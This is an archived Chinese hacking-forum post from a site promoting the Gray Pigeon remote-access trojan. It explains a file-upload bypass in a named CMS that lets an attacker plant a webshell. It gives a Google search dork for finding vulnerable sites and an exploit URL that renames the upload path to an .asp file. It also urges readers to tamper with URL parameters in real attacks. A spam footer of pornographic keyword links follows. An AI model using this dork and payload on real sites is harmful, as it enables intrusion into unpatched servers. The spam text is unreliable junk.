灰鴿子遠程控制軟件

 找回密碼
 立即注冊

QQ登錄

只需一步,快速開始

查看: 16199|回復: 0
打印 上一主題 下一主題

修改url的參數進行突破上傳限制拿webshell 灰鴿子下載www.dumiaotech.com

[復制鏈接]
跳轉到指定樓層
樓主
發表于 2013-2-3 14:12:16 | 只看該作者 回帖獎勵 |正序瀏覽 |閱讀模式
修改url的參數進行突破上傳限制拿webshell 灰鴿子下載


大家可能都看見過這樣的漏洞,這里以瘋子的嘉友科技cms上傳漏洞為例。

谷歌關鍵字:inurl:newslist.asp?NodeCode=   灰鴿子使用教程灰鴿子下載exp:
admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

他原上傳目錄是:/uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
可以看出對參數PicPath進行了修改,
這種漏洞主要是存在文件名或者路徑過濾不嚴,在實戰中多多觀察url中的參數,可以嘗試進行修改數據。

評帖賺銀幣(0) 收起
分享到:  QQ好友和群QQ好友和群
收藏收藏
回復

使用道具 舉報

您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規則

Archiver|手機版|小黑屋|灰鴿子遠程控制軟件|灰鴿子遠程控制軟件 ( 魯ICP備14000061號-4 )

GMT+8, 2025-3-13 09:04 , Processed in 0.068358 second(s), 21 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回復 返回頂部 返回列表
主站蜘蛛池模板: 国产精品一区二区久久精品无码| 无码区日韩特区永久免费系列| 久久久久亚洲AV无码专区桃色| 国产激情无码一区二区app| 国产真人无码作爱视频免费 | 日韩精品无码区免费专区| 亚洲男人在线无码视频| 亚洲AV无码乱码麻豆精品国产| 国产免费久久久久久无码| 亚洲中文字幕无码中文字| 亚洲AV永久无码精品成人| 亚洲av无码专区在线观看素人| 无码中文av有码中文a| 亚洲av永久无码精品秋霞电影影院| 日韩毛片无码永久免费看| 无码囯产精品一区二区免费| 日韩综合无码一区二区| 国产精品爽爽va在线观看无码| 无码乱码av天堂一区二区| 无码精品人妻一区二区三区中| 亚洲国产综合无码一区二区二三区| 色综合99久久久无码国产精品| 国产成人A人亚洲精品无码| 亚洲精品无码永久在线观看| 国产免费av片在线无码免费看| 亚洲中文字幕久久精品无码VA| 无码精品尤物一区二区三区| 日韩AV无码中文无码不卡电影| 亚洲中文字幕久久精品无码APP| 人妻少妇伦在线无码| 无码av不卡一区二区三区| 丰满少妇被猛烈进入无码| 97在线视频人妻无码| 本道久久综合无码中文字幕| 久久久久久99av无码免费网站| 丰满爆乳无码一区二区三区| 18禁无遮挡无码网站免费| 国产精品无码无片在线观看3D| 亚洲AⅤ无码一区二区三区在线| 国产精品毛片无码| 国产精品无码a∨精品|